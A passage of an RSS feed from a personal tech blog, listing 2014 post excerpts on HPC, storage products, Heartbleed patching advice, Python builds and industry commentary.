      <description>Seriously &amp;hellip; no more cheap switches as the central point of information flow in storage or computing clusters. The money you save will be blown in the first hour you pay for down time or architectural changes you need to actually move your data without tossing packets on the ground &amp;hellip; &amp;hellip; because while standard network codes don&amp;rsquo;t care so much if they need to retransmit or lose data, cluster file systems get very &amp;hellip; very &amp;hellip; testy when data doesn&amp;rsquo;t arrive when and where it is supposed to, in the right order, because the cheap-ass switch was too busy tossing packets on the floor.</description>
    </item>
    
    <item>
      <title>Slides from HPC on Wall Street Spring 2014 are up</title>
      <link>https://blog.scalability.org/2014/04/slides-from-hpc-on-wall-street-spring-2014-are-up/</link>
      <pubDate>Tue, 15 Apr 2014 19:30:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/04/slides-from-hpc-on-wall-street-spring-2014-are-up/</guid>
      <description>See here. Very good conference, lots of good discussion.</description>
    </item>
    
    <item>
      <title>hate to be an alarmist, but Heartbleed is worse than I had thought it was</title>
      <link>https://blog.scalability.org/2014/04/hate-to-be-an-alarmist-but-heartbleed-is-worse-than-i-had-thought-it-was/</link>
      <pubDate>Tue, 08 Apr 2014 22:43:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/04/hate-to-be-an-alarmist-but-heartbleed-is-worse-than-i-had-thought-it-was/</guid>
      <description>TL;DR: Run, as in now, before you finish reading this, to update vulnerable OpenSSL packages. Restart your OpenSSL using services (ssh, https, openvpn). Then nuke your keys, and start all over again. Yeah, its that bad. I had hoped, incorrectly, that no one would start asking, &amp;ldquo;hey, can we exploit this in the wild?&amp;rdquo; any time soon. Unfortunately &amp;hellip; exploits are live and out there. Have a look at this session hijacking done using the bug.</description>
    </item>
    
    <item>
      <title>Sometime things work far better than one might expect</title>
      <link>https://blog.scalability.org/2014/04/sometime-things-work-far-better-than-one-might-expect/</link>
      <pubDate>Tue, 08 Apr 2014 16:22:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/04/sometime-things-work-far-better-than-one-might-expect/</guid>
      <description>The day job builds a storage product which integrates Ceph as the storage networking layer. What happened was, in idiomatic American English: We made very tasty lemonade out of very bitter lemons. For the rest of the world, this means we had a bad situation during our setup at the booth. 3 boxes of drives and SSDs. 2 of them arrived. The 3rd may have been stolen, or gone missing, or wound up in a shallow grave somewhere.</description>
    </item>
    
    <item>
      <title>Sometimes the right level of caffeination helps in work</title>
      <link>https://blog.scalability.org/2014/04/sometimes-the-right-level-of-caffeination-helps-in-work/</link>
      <pubDate>Thu, 03 Apr 2014 21:10:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/04/sometimes-the-right-level-of-caffeination-helps-in-work/</guid>
      <description>I had an opportunity to review an old post I had written about playing with prime numbers. In it, I wrote out an explicit formula for a number, expressed as a product of primes. This goes to the definition of a composite or a prime number. Whats interesting is what leaps out at you when you look at something you wrote a while ago. Looking at the formula I wrote down, there is a very easy way to define if a number is prime or composite.</description>
    </item>
    
    <item>
      <title>Doing what we are passionate about</title>
      <link>https://blog.scalability.org/2014/04/doing-what-we-are-passionate-about/</link>
      <pubDate>Wed, 02 Apr 2014 06:20:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/04/doing-what-we-are-passionate-about/</guid>
      <description>I am lucky. I fully admit this. There are people out there whom will tell you that its pure skill that they have been in business and been successful for a long time. Others will admit luck is part of it, but will again, pat themselves on the back for their intestinal fortitude. Few will say &amp;ldquo;I am lucky&amp;rdquo;. Which is a shame, as luck, timing (which you can never really, truly, control), and any number of other factors really are critical to one being able to have the luxury of doing what we are doing.</description>
    </item>
    
    <item>
      <title>Negative latencies</title>
      <link>https://blog.scalability.org/2014/04/negative-latencies/</link>
      <pubDate>Tue, 01 Apr 2014 15:28:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/04/negative-latencies/</guid>
      <description>I&amp;rsquo;ve been thinking for a while that our obsession with reduction of latency in computing and storage could be ameliorated by exploiting a negative latency design. A negative latency design would be one where a hypothetical message would arrive at a receiver before the sender completed sending it. There are a few issues with this. First off is how on earth, or elsewhere, is this possible? Second, aren&amp;rsquo;t there issues with causality violations?</description>
    </item>
    
    <item>
      <title>HPC on Wall Street session on low latency cloud</title>
      <link>https://blog.scalability.org/2014/03/hpc-on-wall-street-session-on-low-latency-cloud/</link>
      <pubDate>Mon, 31 Mar 2014 20:31:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/03/hpc-on-wall-street-session-on-low-latency-cloud/</guid>
      <description>See here for the program sheet. The session is here: HPC on Wall Street Flyer Description is this:
Wall Street and the global financial markets are building low latency infrastructures for pro- cessing and timely response to information content in massive data flows. These big data flows require architectural design patterns at a macro- and micro-level, and have implications for users of cloud systems. This panel will discuss, from macro to micro, how new capabilities and technologies are making a positive impact.</description>
    </item>
    
    <item>
      <title>Arista files for IPO</title>
      <link>https://blog.scalability.org/2014/03/arista-files-for-ipo/</link>
      <pubDate>Mon, 31 Mar 2014 14:20:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/03/arista-files-for-ipo/</guid>
      <description>From Dan Primak&amp;rsquo;s Term Sheet email</description>
    </item>
    
    <item>
      <title>Intel ditches own Hadoop distro in favor of Cloudera</title>
      <link>https://blog.scalability.org/2014/03/intel-ditches-own-hadoop-distro-in-favor-of-cloudera/</link>
      <pubDate>Thu, 27 Mar 2014 18:29:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/03/intel-ditches-own-hadoop-distro-in-favor-of-cloudera/</guid>
      <description>Last year, Intel started building its own distro of Hadoop. Their argument was that they were optimizing it for their architecture (as compared to, say, ARM). Today came word (via InsideHPC.com) that they are switching to Cloudera. This makes perfect sense to me. Intel couldn&amp;rsquo;t really optimize Hadoop by compiler options to use new instruction capability (part of their selling point), as Hadoop is a Java thing. And Java has its own VM, and many performance touch points that have nothing to do with processor architecture.</description>
    </item>
    
    <item>
      <title>Nice interview with Freeman Dyson</title>
      <link>https://blog.scalability.org/2014/03/nice-interview-with-freeman-dyson/</link>
      <pubDate>Thu, 27 Mar 2014 00:29:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/03/nice-interview-with-freeman-dyson/</guid>
      <description>Freeman Dyson is an incredible scientist. I imagine he, Terrance Tao, Paul Erdos and a number of others are all woven from the same cloth. Dyson has done some amazing work, and probably will do some more amazing work. The interview is here. One of the comments he made really struck me as being dead on correct &amp;hellip;
I&amp;rsquo;ve used similar language, describing a Ph.D. as a union card. And I agree it takes far too long in physics.</description>
    </item>
    
    <item>
      <title>Free market forces at work, the way they should be</title>
      <link>https://blog.scalability.org/2014/03/free-market-forces-at-work-the-way-they-should-be/</link>
      <pubDate>Tue, 25 Mar 2014 15:29:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/03/free-market-forces-at-work-the-way-they-should-be/</guid>
      <description>There&amp;rsquo;s a much publicized (in SV) trial going on over an oligarchic wage suppression scheme that was in force between a number of big players in SV. Apart from Facebook that is. Techcrunch has the details. What transpires when free market forces are allowed to work with their invisible hands unconstrained? Simple.
Kudos to facebook for doing the right thing, though in all honesty, I don&amp;rsquo;t attribute this to being altruistic on their part.</description>
    </item>
    
    <item>
      <title>Staring into voids that stare back</title>
      <link>https://blog.scalability.org/2014/03/staring-into-voids-that-stare-back/</link>
      <pubDate>Tue, 25 Mar 2014 14:31:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/03/staring-into-voids-that-stare-back/</guid>
      <description>I had mentioned this in my write up about our 10 year anniversary.
And this post yesterday from Scott Weiss at Andreessen Horowitz
Its in that staring deep and hard into the yawning void that one gets their inspiration. Call it sheer abject terror, or motivation. Whatever. It juices your processors into overdrive if you are an entrepreneur. You are at your most creative when you are at your most fearful.</description>
    </item>
    
    <item>
      <title>Good read on ageism in SV VCs</title>
      <link>https://blog.scalability.org/2014/03/good-read-on-ageism-in-sv-vcs/</link>
      <pubDate>Mon, 24 Mar 2014 11:57:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/03/good-read-on-ageism-in-sv-vcs/</guid>
      <description>Oddly enough at the New Republic. Article is here. I was somewhat amused by the read, but some of it rung quite true. Its nice to hear of more of the signals one needs to read VC tea leaves. They never say no, but they do move goal posts, always outward, always away from you. The article implies they get hung up on TAM, as a proxy for what they really think.</description>
    </item>
    
    <item>
      <title>Unicode and python 64 bit build</title>
      <link>https://blog.scalability.org/2014/03/unicode-any-python-64-bit-build/</link>
      <pubDate>Sat, 22 Mar 2014 18:25:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/03/unicode-any-python-64-bit-build/</guid>
      <description>[Update] I gave up on 2.7.x. Nothing I did made it work. I removed all the options apart from prefix for compilation of 3.4.0. That worked. Now onto building ipython, ijulia and other good things (SciPy stack). We will use 3.x going forward rather than try to remain compatible with 2.x. Updating our tool chain to include a modern python which will be outside of the distro version. Long &amp;hellip; long experience dealing with distro based tools are that they are usually &amp;hellip; badly &amp;hellip; out of date.</description>
    </item>
    
    <item>
      <title>SIOS Inst</title>
      <link>https://blog.scalability.org/2014/03/sios-inst/</link>
      <pubDate>Sat, 22 Mar 2014 13:15:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/03/sios-inst/</guid>
      <description>Ok, I am taking the leap. I&amp;rsquo;ve started working on the SIOS Inst system. Basically, after reviewing everything thats broken (and for that matter unfixable) in the anaconda, debian-installer, and other installation mechanisms, I&amp;rsquo;ve decided that for our purposes, the only way that we are going to get correct and reliable builds for stateful systems is to forgo these systems advanced installation mechanisms. If we can skip the code entirely, we will.</description>
    </item>
    
    <item>
      <title>HPC on Wall Street</title>
      <link>https://blog.scalability.org/2014/03/hpc-on-wall-street/</link>
      <pubDate>Thu, 20 Mar 2014 15:09:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/03/hpc-on-wall-street/</guid>
      <description>Not only do we have a booth, but we are sponsoring a session on Low Latency Cloud and Big Data. Roosevelt Hotel in NYC on 7-April. See the site for more details. If you&amp;rsquo;d like to attend and need a pass, please contact me at the day job. Our partners Lucera, Inktank, and Pluribus Networks will be there with us. Possible more.</description>
    </item>
    
    <item>
      <title>Not so fast ...</title>
      <link>https://blog.scalability.org/2014/03/not-so-fast/</link>
      <pubDate>Tue, 18 Mar 2014 23:46:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/03/not-so-fast/</guid>
      <description>Well, after nearly a decade of hooplah over a realization of a quantum computer, an interesting study found that it was
There are a few important elements of this &amp;hellip; it uses 1/5th the number of qubits that the newer generation machine used. But it wasn&amp;rsquo;t, as earlier reported, thousands of times faster.
Way back in the day, when working on benchmarking big machines, and comparing performance, one of the major criteria was using identical (or as near to identical) algorithms as possible to assess machine speed, compiler quality, etc.</description>
    </item>
    
    <item>
      <title>Which (computer) language to learn next?</title>
      <link>https://blog.scalability.org/2014/03/which-computer-language-to-learn-next/</link>
      <pubDate>Sun, 16 Mar 2014 16:55:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/03/which-computer-language-to-learn-next/</guid>
      <description>Ok, I have as one of my professional goals, to learn a new computer language. I am at master level in several, proficient in others, and have working knowledge of a fair number. I&amp;rsquo;ve forgotten more than I care to admit about some (Fortran, Basic, C/C++, APL, x86 Assembler). The contenders for me should be useful languages. These are not things that should be learned for the sake of learning, but for real useful purposes.</description>
    </item>
    
    <item>
      <title>OT: AirBnB and their issues</title>
      <link>https://blog.scalability.org/2014/03/ot-airbnb-and-their-issues/</link>
      <pubDate>Sun, 16 Mar 2014 16:19:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/03/ot-airbnb-and-their-issues/</guid>
      <description>Ok, this one is sad. Saw this linked off of hacker news. I am not sure if this is satirical, humorous, or real. It doesn&amp;rsquo;t quite matter though. We&amp;rsquo;ve used AirBnB twice now. And we have a firm policy, as a direct result of those very negative experiences, of never &amp;hellip; ever &amp;hellip; using it again. To be fair, AirBnB is effectively a market maker dealing with the commodity of unused space which could be turned into a profitable asset.</description>
    </item>
    
    <item>
      <title>Playing with several noSQL/document/tuple/time series DBs</title>
      <link>https://blog.scalability.org/2014/03/playing-with-several-nosqldocumenttupletime-series-dbs/</link>
      <pubDate>Sun, 16 Mar 2014 04:00:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/03/playing-with-several-nosqldocumenttupletime-series-dbs/</guid>
      <description>We&amp;rsquo;ve been using MongoDB for a while for a number of things, internally, and thinking about using it for Tiburon as the restful interface. It has some nice aspects about it, but it also has some known issues for larger DBs. Considering what we want to do for some of our work, these larger DB issues are potentially problematic for us. Basically, MongoDB is one of the class of mmap&amp;rsquo;ed DBs.</description>
    </item>
    
    <item>
      <title>Retired Apache as web server</title>
      <link>https://blog.scalability.org/2014/03/retired-apache-as-web-server/</link>
      <pubDate>Sun, 16 Mar 2014 03:05:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/03/retired-apache-as-web-server/</guid>
      <description>This has been a long time coming for me. I&amp;rsquo;ve been using Apache in one form or another since the 90&amp;rsquo;s. I&amp;rsquo;ve never found it easy to configure, and often ran into maddening bugs in the config files and how they interacted with the server itself. I&amp;rsquo;d taken a long time to evaluate the various alternatives. Lighttpd caught my fancy for a while, but I ran into similar problems with config.</description>
    </item>
    
    <item>
      <title>Couldn&#39;t have said it better myself ...</title>
      <link>https://blog.scalability.org/2014/03/couldnt-have-said-it-better-myself/</link>
      <pubDate>Sat, 15 Mar 2014 00:22:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/03/couldnt-have-said-it-better-myself/</guid>
      <description>Robin at StorageMojo has an interesting article up (right after the one about Violin maybe being dead). I won&amp;rsquo;t comment on that second one, other than to say I disagree with his analysis and conclusions. As the day job is nominally a competitor (we&amp;rsquo;ve seen them in a deal, once) I am biased. But the fundamental analysis simply doesn&amp;rsquo;t look good for them (or Fusion, or &amp;hellip;). They need a larger player to buy them.</description>
    </item>
    
    <item>
      <title>The resurrection of autoinst ...</title>
      <link>https://blog.scalability.org/2014/03/the-resurrection-of-autoinst/</link>
      <pubDate>Thu, 13 Mar 2014 01:16:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/03/the-resurrection-of-autoinst/</guid>
      <description>A long time ago, in a galaxy far, far away &amp;hellip; I worked for this company named SGI. SGI machines and software were awesome &amp;hellip; I had used them (R3k and R8k) for doing calculations for my thesis. Very very fast. But very hard to install/manage. In fact, brutally hard. This was not lost on customers with many of these devices. One of those customers read SGI the riot act on this.</description>
    </item>
    
    <item>
      <title>Good read on the faux-STEM shortages</title>
      <link>https://blog.scalability.org/2014/03/good-read-on-the-faux-stem-shortages/</link>
      <pubDate>Mon, 10 Mar 2014 15:30:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/03/good-read-on-the-faux-stem-shortages/</guid>
      <description>Good post over at Math Blog. There is no short of STEM folks in the US, and hasn&amp;rsquo;t been for a long &amp;hellip; long time. Any shortage of STEM folks would be well represented by a number of economic factors: 1) rapidly rising compensation rates (economic scarcity impacts upon costs of labor), 2) very short job search times for STEM folks, 3) additional market based initiatives to find and retain STEM folks.</description>
    </item>
    
    <item>
      <title>Reality vs what one might like</title>
      <link>https://blog.scalability.org/2014/03/reality-vs-what-one-might-like/</link>
      <pubDate>Tue, 04 Mar 2014 17:19:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/03/reality-vs-what-one-might-like/</guid>
      <description>Many years ago, I had this thought in my head that I wanted to be a physics professor. No, really. I went through all the motions. Undergrad BS, then MS and then PhD. While I was doing this, the Soviet Union collapsed. How was that fact related to my former desire to be a physics prof? Simple. Its economics. Its always economics. Anyone tells you differently, they are either lying or selling you something.</description>
    </item>
    
    <item>
      <title>Just created a new external dns on Digital Ocean</title>
      <link>https://blog.scalability.org/2014/03/just-created-a-new-external-dns-on-digital-ocean/</link>
      <pubDate>Tue, 04 Mar 2014 05:20:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/03/just-created-a-new-external-dns-on-digital-ocean/</guid>
      <description>About 2 years ago, we had an issue with an internal server blowing up, taking data and config with it. I resolved to place some of our core infrastructure (external DNS, etc.) beyond our virtual boundaries, so we could maintain email/web presence in the event of a power or server issue. This has proven to be a prescient and wise move. We started out on Amazon with their small instances. And started out with dnsmasq, as I didn&amp;rsquo;t want to re-learn bind and all that config.</description>
    </item>
    
    <item>
      <title>Our second(!) Unison FhGFS based unit</title>
      <link>https://blog.scalability.org/2014/03/our-second-unison-fhgfs-based-unit/</link>
      <pubDate>Mon, 03 Mar 2014 22:26:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/03/our-second-unison-fhgfs-based-unit/</guid>
      <description>Burning in &amp;hellip; Hammering on all disks, while computing pi, e, sqrt(2), &amp;hellip; It is a thing of beauty &amp;hellip;
[ ](/images/unison.png)
First one was an Isilon replacement. We seem to have many more of these in queue.</description>
    </item>
    
    <item>
      <title>A must-read on HD selection</title>
      <link>https://blog.scalability.org/2014/02/a-must-read-on-hd-selection/</link>
      <pubDate>Fri, 28 Feb 2014 19:32:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/02/a-must-read-on-hd-selection/</guid>
      <description>Henry could probably write far more in depth about this subject than he did. Regardless this is a must-read article. Now it is important to understand where you can use each technology, and Henry does a great job of explaining some of these. However, its important to note that as some of the file system and device bits are pushed into higher levels in the stack, some of the functionality becomes redundant at the lower levels.</description>
    </item>
    
    <item>
      <title>darn</title>
      <link>https://blog.scalability.org/2014/02/darn/</link>
      <pubDate>Fri, 28 Feb 2014 15:46:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/02/darn/</guid>
      <description>E: Couldn&#39;t find these debs: pico dtrace  Forgot what platform I was working on &amp;hellip;</description>
    </item>
    
    <item>
      <title>Big blue blues?</title>
      <link>https://blog.scalability.org/2014/02/big-blue-blues/</link>
      <pubDate>Fri, 28 Feb 2014 15:04:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/02/big-blue-blues/</guid>
      <description>I remember my two stints at IBM T.J. Watson very well &amp;hellip; first as a summer student (college hire for summer), and then as an engineer after finishing undergraduate. It was a wonderful place. I really enjoyed it. Not simply computer nerd heaven, but physical scientist nerd heaven as well. IBM famously was the company that resisted layoffs and downsizing for a long time. But it eventually gave in, and was forced into RIF actions during their troubled times in the 1990&amp;rsquo;s and 2000&amp;rsquo;s.</description>
    </item>
    
    <item>
      <title>In 18 months ...</title>
      <link>https://blog.scalability.org/2014/02/in-18-months/</link>
      <pubDate>Mon, 24 Feb 2014 06:15:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/02/in-18-months/</guid>
      <description>&amp;hellip; I&amp;rsquo;ll have hit 10 years of blogitude &amp;hellip; bloggerisms &amp;hellip; er &amp;hellip; generation of large amounts of noise and heat, and hopefully at least a little light? Mebbe?</description>
    </item>
    
    <item>
      <title>Excellent article on Lucera&#39;s financial cloud</title>
      <link>https://blog.scalability.org/2014/02/excellent-article-on-luceras-financial-cloud/</link>
      <pubDate>Fri, 21 Feb 2014 03:41:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/02/excellent-article-on-luceras-financial-cloud/</guid>
      <description>&amp;hellip; that the day job is building atop our siCloud platform. In the article (definitely read it!) there is an great discussion about what the fundamental differences are between what Lucera is aiming for and what more traditional commodity cloud vendors are focused upon. When it comes down to it, the difference is architecting for density of VMs in the commodity cloud versus architecting for performance and low latency in the performance cloud (Lucera&amp;rsquo;s).</description>
    </item>
    
    <item>
      <title>Does fibre channel have a future?</title>
      <link>https://blog.scalability.org/2014/02/does-fibre-channel-have-a-future/</link>
      <pubDate>Thu, 20 Feb 2014 02:30:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/02/does-fibre-channel-have-a-future/</guid>
      <description>Strange question. Its really a question about block storage in general than FC in particular, but I have a sense that FC may be the first to go down as it were. Ok &amp;hellip; I&amp;rsquo;ve been looking up mechanisms to help customers in a media editing environment. Their preferred file system depends, to a degree, upon IP over FC for connectivity. They need to interconnect Mac OSX machines, Linux and Windows machines to the same storage resources.</description>
    </item>
    
    <item>
      <title>The end of an era</title>
      <link>https://blog.scalability.org/2014/02/the-end-of-an-era/</link>
      <pubDate>Tue, 18 Feb 2014 21:09:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/02/the-end-of-an-era/</guid>
      <description>Posted to the xfs list:
SGI is stepping out of maintainer roles for xfs, xfsprogs, xfsdump, and xfstests. This removes me from the MAINTAINERS entry. Signed-off-by: XXXXXXXXXXXXXX --- [SGI will continue to host oss.sgi.com as a repository for the XFS open source git trees, mailing list, and documentation as is provided today. And will also continue to participate in a less formal role.] Thanks! -Ben MAINTAINERS | 1 - 1 file changed, 1 deletion(-)  SGI the original creator of xfs, almost 20 years ago, is removing itself from the pathway going forward.</description>
    </item>
    
    <item>
      <title>Updates: been busy, but here are a few</title>
      <link>https://blog.scalability.org/2014/02/updates-been-busy-but-here-are-a-few/</link>
      <pubDate>Sat, 15 Feb 2014 17:34:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/02/updates-been-busy-but-here-are-a-few/</guid>
      <description>We&amp;rsquo;ve sold our first Unison storage cloud to replace an Isilon unit for a bioinformatics core. Performance and density matter, and we have both. About to deploy next phase of cloud for one of our partners &amp;hellip; Setting up an exciting trade show presence &amp;hellip; Working on an extension of what we&amp;rsquo;ve been wanting to build for a long time &amp;hellip; and now it looks like its in reach. Oh &amp;hellip; my &amp;hellip; this is huge &amp;hellip;</description>
    </item>
    
    <item>
      <title>Why not go Galt?</title>
      <link>https://blog.scalability.org/2014/02/why-not-go-galt/</link>
      <pubDate>Sun, 09 Feb 2014 22:59:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/02/why-not-go-galt/</guid>
      <description>For those who don&amp;rsquo;t get the reference, &amp;ldquo;going Galt&amp;rdquo; points back to the masterpiece novel &amp;ldquo;Atlas Shrugged&amp;rdquo; by Ayn Rand. In it, one of the characters is named John Galt, and part of what he does, early in the novel, is convince those whom create jobs, and wealth in the country, to abandon their efforts, as the government lurches harder and farther to the redistributionist world view. Indeed, the country eventually goes full on socialist in the story, where people are not allowed to quit work, take a better job, and so forth.</description>
    </item>
    
    <item>
      <title>The state of HPC tier 1 vendors</title>
      <link>https://blog.scalability.org/2014/02/the-state-of-hpc-tier-1-vendors/</link>
      <pubDate>Fri, 07 Feb 2014 19:27:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/02/the-state-of-hpc-tier-1-vendors/</guid>
      <description>Much has been happening in the HPC tier 1 vendor space. Some of it has made the news, much has not. The TL;DR version: I believe that most of the tier 1 HPC capability may have been wiped out over the last few months. 1 tier 1 and a bunch of tier 2 are left. Basically, the HPC market has a number of tiers within it, and product mixes across these tiers.</description>
    </item>
    
    <item>
      <title>Lyrical offspring</title>
      <link>https://blog.scalability.org/2014/02/lyrical-offspring/</link>
      <pubDate>Fri, 07 Feb 2014 03:28:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/02/lyrical-offspring/</guid>
      <description>I can&amp;rsquo;t name her, at her request, but this is my progeny singing for her high school battle of the bands. They took second place.
Fantastic job, offspring of mine!</description>
    </item>
    
    <item>
      <title>The changing face of storage</title>
      <link>https://blog.scalability.org/2014/02/the-changing-face-of-storage/</link>
      <pubDate>Thu, 06 Feb 2014 17:04:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/02/the-changing-face-of-storage/</guid>
      <description>Over at InsideHPC, Rich pointed to an blog by Henry Newman about the changing face of SSD. I&amp;rsquo;d argue that its not just SSD, but storage in general. But Henry, as usual, nails it. Henry opines
To a degree, we see them at least investing in the technologies behind the up market devices. At &amp;ldquo;worst&amp;rdquo; acquiring them. Because as Henry points out
Very much so. Look at Seagate and WD with their micro NAS appliances.</description>
    </item>
    
    <item>
      <title>On those annoying full page non-scrollable javascript ads on pages</title>
      <link>https://blog.scalability.org/2014/02/on-those-annoying-full-page-non-scrollable-javascript-ads-on-pages/</link>
      <pubDate>Thu, 06 Feb 2014 16:52:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/02/on-those-annoying-full-page-non-scrollable-javascript-ads-on-pages/</guid>
      <description>Guys, please, seriously, stop that. They don&amp;rsquo;t work on mobile or desktop devices when the window size is smaller than the area required to see the [X] Close button. Whom ever came up with this, it is a bad idea. Stop it now. Before I get pissed off enough to write a web proxy that specifically filters out such stupidity, or purposefully renders that to an offscreen invisible layer which is forced to be non-modal.</description>
    </item>
    
    <item>
      <title>An offer for the day job&#39;s customers in financial services</title>
      <link>https://blog.scalability.org/2014/02/an-offer-for-the-day-jobs-customers-in-financial-services/</link>
      <pubDate>Tue, 04 Feb 2014 20:05:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/02/an-offer-for-the-day-jobs-customers-in-financial-services/</guid>
      <description>See here. TL;DR version: A free month on Lucera&amp;rsquo;s cloud.</description>
    </item>
    
    <item>
      <title>OCP thoughts</title>
      <link>https://blog.scalability.org/2014/02/ocp-thoughts/</link>
      <pubDate>Sun, 02 Feb 2014 20:01:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/02/ocp-thoughts/</guid>
      <description>I didn&amp;rsquo;t post a response to the article written a little more than a year ago claiming that OCP had &amp;ldquo;blown up the server market&amp;rdquo;. Yes, that was really in the title. I&amp;rsquo;ll ignore most of the obvious issues with this, but lets review a year later, shall we? Open hardware designs are great in concept. Share your design with the world, and lower your customers costs &amp;hellip; er &amp;hellip; whoops.</description>
    </item>
    
    <item>
      <title>IBM&#39;s sale of x86 servers and networking to Lenovo</title>
      <link>https://blog.scalability.org/2014/02/ibms-sale-of-x86-servers-and-networking-to-lenovo/</link>
      <pubDate>Sun, 02 Feb 2014 07:04:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/02/ibms-sale-of-x86-servers-and-networking-to-lenovo/</guid>
      <description>I&amp;rsquo;d waited a while before posting on this for a number of reasons, not the least of which was I was quite busy. But also, I wanted to understand what was and was not sold. Now that some of the dust has settled, and both companies have publicly discussed this, we know pretty well what is included in the sale. I don&amp;rsquo;t need to get in to that aspect, you can read it all very succinctly on Lenovo&amp;rsquo;s site.</description>
    </item>
    
    <item>
      <title>The last straw for us for gluster</title>
      <link>https://blog.scalability.org/2014/01/the-last-straw-for-us-for-gluster/</link>
      <pubDate>Wed, 29 Jan 2014 15:38:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/01/the-last-straw-for-us-for-gluster/</guid>
      <description>We&amp;rsquo;ve had customers migrating off of it for the past few years, as bugs have gone un-addressed, reports closed, and discussions cut off or ignored. Its costing us too much in support time and effort now. Its time to pull the plug. I like many things about gluster. Really I do. I&amp;rsquo;ve been a strong proponent of it long before it was cool to do so, as the design was in line with what I thought was needed to build scale out file systems.</description>
    </item>
    
    <item>
      <title>We had a record setting, knock the barn doors down year last year</title>
      <link>https://blog.scalability.org/2014/01/we-had-a-record-setting-knock-the-barn-doors-down-year-last-year/</link>
      <pubDate>Sat, 25 Jan 2014 15:32:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/01/we-had-a-record-setting-knock-the-barn-doors-down-year-last-year/</guid>
      <description>&amp;hellip; and believe it or not, I forgot to mention it. This is the first time in company history that we had a backlog going into Q1. Orders being built and tested on the last work day of the year. We grew, not the amount we had originally forecast, but we understand why (and sadly have little control over that aspect). We are working very hard on our appliances &amp;hellip; I am blown away as to how perfect a fit they are for folks.</description>
    </item>
    
    <item>
      <title>Something has been bugging me about the CentOS absorption by Red Hat</title>
      <link>https://blog.scalability.org/2014/01/something-has-been-bugging-me-about-the-centos-absorption-by-red-hat/</link>
      <pubDate>Sat, 25 Jan 2014 06:35:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/01/something-has-been-bugging-me-about-the-centos-absorption-by-red-hat/</guid>
      <description>I am obviously not a lawyer, and I&amp;rsquo;ve not consulted one. Feel free to point out my mistakes, and note that this is not legal advice. You need to speak to a lawyer on that, I am just guessing. The language on here is pretty clear as to what Red Hat owns. I have no problem with their ownership of it. Nor do I have a problem with them imposing their particular concept of ownership.</description>
    </item>
    
    <item>
      <title>Yay, latest Java update broke Supermicro remote console</title>
      <link>https://blog.scalability.org/2014/01/yay-latest-java-update-broke-supermicro-remote-console/</link>
      <pubDate>Fri, 24 Jan 2014 16:41:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/01/yay-latest-java-update-broke-supermicro-remote-console/</guid>
      <description>JRE 7 u 51. Self signed Java console applet. Let the hilarity begin. I tried uploading our own cert and key to the unit. No luck. Its the applet the needs to be re-signed. This is the joyous message that awaits:
Of course, the IPMIview tool sorta kinda works. Though its useless for remote support ops. Doesn&amp;rsquo;t set off the signed issue. Mebbe they ignore signing? Which is worse &amp;hellip; the self signed cert, or the sign ignoring app.</description>
    </item>
    
    <item>
      <title>An analytical takedown, gone awry</title>
      <link>https://blog.scalability.org/2014/01/an-analytical-takedown-gone-awry/</link>
      <pubDate>Thu, 23 Jan 2014 22:57:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/01/an-analytical-takedown-gone-awry/</guid>
      <description>See here which is the response to the arvix article here. While the Facebook data scientists refer to their post as a debunking, using irrelevant metric (enrollment vs google rank? and the theory behind this is &amp;hellip; what?), the paper points out something quite important. Social networking success has been largely ephermal, and not sustainable. Its a transient phenomenon. Anyone remember Friendster? MySpace? More to the point, the internet entities that dominated 15 years ago are largely gone.</description>
    </item>
    
    <item>
      <title>When bugs attack ... the case of the ever expanding VirtualBox image</title>
      <link>https://blog.scalability.org/2014/01/when-bugs-attack-the-case-of-the-ever-expanding-virtualbox-image/</link>
      <pubDate>Wed, 08 Jan 2014 15:47:18 +0000</pubDate>
      
